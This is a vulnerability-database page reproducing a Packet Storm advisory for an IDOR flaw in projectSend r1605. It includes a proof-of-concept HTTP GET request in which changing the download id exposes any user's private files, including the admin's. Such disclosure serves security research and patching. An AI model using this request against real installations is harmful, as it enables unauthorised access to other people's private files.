Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

projectSend r1605 Private File Download

🗓️ 03 May 2023 00:00:00Reported by Mirabbas AgalarovType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 295 Views

projectSend r1605 Private File Download IDOR PH

Code
`Exploit Title: projectSend r1605 - Private file download  
Application: projectSend  
Version: r1605  
Bugs: IDOR  
Technology: PHP  
Vendor URL: https://www.projectsend.org/  
Software Link: https://www.projectsend.org/  
Date of found: 24-01-2023  
Author: Mirabbas Ağalarov  
Tested on: Linux   
  
  
  
Technical Details & POC  
========================================  
  
1.Access to private files of any user, including admin  
  
  
just change id  
  
  
  
GET /process.php?do=download&id=[any user's private pictures id] HTTP/1.1  
Host: localhost  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/manage-files.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: download_started=false; PHPSESSID=e46dtgmf95uu0usnceebfqbp0f  
Connection: close  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 May 2023 00:00Current
6.9Medium risk
Vulners AI Score6.9
projectsendr1605private file downloadidorphpsecurity vulnerabilityinformation security
295